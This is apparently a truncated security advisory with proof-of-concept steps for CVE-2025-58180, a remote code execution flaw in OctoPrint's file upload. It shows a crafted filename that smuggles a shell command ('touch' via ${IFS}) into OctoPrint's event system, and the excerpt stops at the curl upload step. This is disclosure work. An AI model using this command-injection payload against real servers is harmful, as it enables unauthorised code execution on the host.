CVE-2025-58180 RCE in OctoPrint via Unsanitized Filename in File Upload In OctoPrint version <=1.11.2, an attacker with file upload access (e.g., valid API key or session) can craft a malicious filename that bypasses sanitization and is later executed by OctoPrint’s event system, leading to remote code execution (RCE) on the host PoC: Steps to Recreate Vulnerability Step 1: Version Info Downloaded latest stable release: OctoPrint 1.11.2 Step 2: Run OctoPrint bash octoprint serve –port 5000 –debug Open http://127.0.0.1:5000 in browser. Go through the initial wizard → create user with default settings (disabled: connectivity, anonymous, plugin). Grab the API key from Settings → API → save for later. Stop the OctoPrint service once above steps are done. Step 3: Configure Event Subscription Following OctoPrint events documentation: Edit ~/.octoprint/config.yaml: yaml events: enabled: true subscriptions: – event: FileAdded type: system debug: true command: "{path}" Step 4: Create Sample G-code Create /tmp/gcode/ok.gcode: gcode ; minimal gcode G28 M105 Restart OctoPrint service. Step 5: Proof of Concept RCE Export API key: bash export API_KEY='' Verify file doesn’t exist: bash ls -la /tmp/test123 Craft malicious filename payload: INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode' Explanation: ${IFS} is the shell’s Internal Field Separator (usually a space). It bypasses sanitization when injected. Send curl request: bash curl…Read More